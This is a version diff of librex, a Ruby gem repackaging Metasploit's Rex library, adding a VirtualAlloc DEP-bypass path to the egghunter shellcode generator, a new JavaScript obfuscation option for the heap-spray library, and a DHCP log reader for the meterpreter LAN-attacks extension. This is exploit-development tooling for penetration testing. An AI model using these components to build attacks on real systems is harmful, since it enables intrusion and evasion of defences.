librex 0.0.50 → 0.0.51

data/README.markdown

@@ -3,7 +3,7 @@
 A non-official re-packaging of the Rex library as a gem for easy of usage of the Metasploit REX framework in a non Metasploit application. I received permission from HDM to create this package.
 
 Currently based on:
-SVN Revision: 13644
+SVN Revision: 13694
 
 # Credits
 The Metasploit development team <http://www.metasploit.com>

data/lib/rex/exploitation/egghunter.rb

@@ -58,29 +58,34 @@ class Egghunter
 				end
 				startstub << "\n\t" if startstub.length > 0
 
-				getpointer = ''
-				getsize = ''
-				getpc = ''
-				jmppayload = "jmp edi"
+				getpointer   = ''
+				getsize      = ''
+				getalloctype = ''
+				getpc        = ''				
+				jmppayload   = "jmp edi"	
 
-				apireg = (opts[:depreg] || 'esi').downcase
+				apireg = opts[:depreg] || 'esi'
 				apidest = opts[:depdest]
 				depsize = opts[:depsize]
-
+				
 				freeregs = [ "esi", "ebp", "ecx", "ebx" ]
-
+				
 				reginfo = {
 					"ebx"=>["bx","bl","bh"],
 					"ecx"=>["cx","cl","ch"]
 				}
 
 				if opts[:depmethod]
-
+				
 					if freeregs.index(apireg) == nil
 						getpointer << "mov #{freeregs[0]},#{apireg}\n\t"
 						apireg = freeregs[0]
 					end
 					freeregs.delete(apireg)
+					
+					if opts[:depmethod].downcase == "virtualalloc"
+						depsize = 0xfff
+					end
 
 					if opts[:depmethod].downcase == "copy" || opts[:depmethod].downcase == "copy_size"
 						if apidest
@@ -94,7 +99,7 @@ class Egghunter
 						end
 						freeregs.delete(apidest)
 					end
-
+					
 
 					sizereg = freeregs[0]
 
@@ -123,13 +128,11 @@ class Egghunter
 							elsif high != "00"
 								getsize << "mov #{regvars[2]},0x%s\n\t" % high
 							end
-							getsize << "push #{sizereg}\n\t"
 						end
 						if sizereg == "ebp"
 							if low != "00" and high != "00"
 								getsize << "xor #{sizereg},#{sizereg}\n\t"
 								getsize << "mov bp,0x%s\n\t" % sizebytes
-								getsize << "push #{sizereg}\n\t"
 							end
 						end
 						# last resort
@@ -153,16 +156,27 @@ class Egghunter
 							if delta > 0
 								getsize << "add #{sizereg},0x%02x\n\t" % delta
 							end
-							getsize << "push #{sizereg}\n\t"
 						end
+						if opts[:depmethod].downcase == "virtualalloc"
+							getsize << "inc #{sizereg}\n\t"
+						end
+						
+						getsize << "push #{sizereg}\n\t"
+						
 					end
-				
+					
+					getalloctype = getsize
 
 					case opts[:depmethod].downcase
 						when "virtualprotect"
 							jmppayload = "push esp\n\tpush 0x40\n\t"
 							jmppayload << getsize
 							jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
+						when "virtualalloc"
+							jmppayload = "push 0x40\n\t"
+							jmppayload << getalloctype
+							jmppayload << "push 0x01\n\t"
+							jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
 						when "copy"
 							jmppayload = getpc
 							jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"

data/lib/rex/exploitation/heaplib.rb

@@ -1,5 +1,6 @@
 require 'rex/text'
 require 'rex/exploitation/obfuscatejs'
+require 'rex/exploitation/jsobfu'
 
 module Rex
 module Exploitation
@@ -43,7 +44,7 @@ class HeapLib
 					"debug",
 				],
 			"Classes" =>
-				[	
+				[
 					{ 'Namespace' => "heapLib", 'Class' => "ie" }
 				],
 			"Namespaces" =>
@@ -55,8 +56,8 @@ class HeapLib
 	#
 	# Initializes the heap library javascript
 	#
-	def initialize(custom_js = '')
-		load_js(custom_js)
+	def initialize(custom_js = '', opts = {})
+		load_js(custom_js, opts)
 	end
 
 	#
@@ -71,23 +72,32 @@ protected
 	#
 	# Loads the raw javascript from the source file and strips out comments
 	#
-	def load_js(custom_js)
-		
+	def load_js(custom_js, opts = {})
+
 		# Grab the complete javascript
-		File.open(JavascriptFile) { |f|
+		File.open(JavascriptFile) do |f|
 			@js = f.read
-		}
-		
+		end
+
 		# Decode the text
 		@js = Rex::Text.decode_base64(@js)
-		
+
 		# Append the real code
 		@js += "\n" + custom_js
-	
-		# Obfuscate the javascript
+
+		if opts[:newobfu]
+			# Obfuscate the javascript using the new lexer method
+			@js = JSObfu.new(@js)
+			return @js.obfuscate
+		elsif opts[:noobfu]
+			# Do not obfuscate, let the exploit do the work (useful to avoid double obfuscation)
+			return @js
+		end
+
+		# Default to the old method
+		# Obfuscate the javascript using the old method
 		@js = ObfuscateJS.obfuscate(@js, 'Symbols' => SymbolNames)
 	end
-
 end
 
 end

data/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb

@@ -57,6 +57,20 @@ class Lanattacks < Extension
 		true
 	end
 
+	def dhcp_log
+		response = client.send_request(Packet.create_request('lanattacks_dhcp_log'))
+		entries = []
+		if( response.result == 0 )
+			log = response.get_tlv_value( TLV_TYPE_LANATTACKS_RAW )
+			while log.length > 0
+				mac = log.slice!(0..5)
+				ip = log.slice!(0..3)
+				entries << [ mac, ip ]
+			end
+		end
+		entries
+	end
+
 	def start_tftp
 		client.send_request(Packet.create_request('lanattacks_start_tftp'))
 		true

metadata

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: librex
 version: !ruby/object:Gem::Version
-  version: 0.0.50
+  version: 0.0.51
   prerelease: 
 platform: ruby
 authors:
@@ -10,10 +10,10 @@ authors:
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2011-08-27 00:00:00.000000000Z
+date: 2011-09-05 00:00:00.000000000Z
 dependencies: []
 description: Rex provides a variety of classes useful for security testing and exploit
-  development. Based on SVN Revision 13644
+  development. Based on SVN Revision 13694
 email:
 - hdm@metasploit.com
 - jacob.hammack@hammackj.com